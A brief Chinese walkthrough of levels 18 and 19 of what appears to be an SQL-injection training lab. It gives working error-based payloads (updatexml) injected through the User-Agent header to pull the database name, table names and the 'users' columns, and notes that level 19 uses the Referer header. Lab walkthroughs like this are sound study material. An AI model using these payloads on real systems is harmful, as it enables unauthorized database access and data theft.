第十八关:通过借鉴各种大佬的题解,最后还是一知半解,这里只说明方法(本人还没有完全吃透所以不了解为什么);
首先用正确的账号密码登录后发现页面回显了你的User-Agent,可以猜测能从User-Agent进行注入,查看源码之后果然可以~;
接下来是用burp软件进行抓包修改User-Agent,我这里就直接上语句吧;
数据库名:User-Agent: Hyafinthus' or updatexml(1,concat('#',(database())),0),'','')#
数据表名:
User-Agent: ' or updatexml(1,concat('#',(select group_concat(table_name) from information_schema.tables where table_schema='security')),0),'','')#
字段名:
User-Agent: ' or updatexml(1,concat('#',(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),0),'','')#
第十九关:用同样的方法,发现这次换成了Referer注入,其余和上一关并无差别;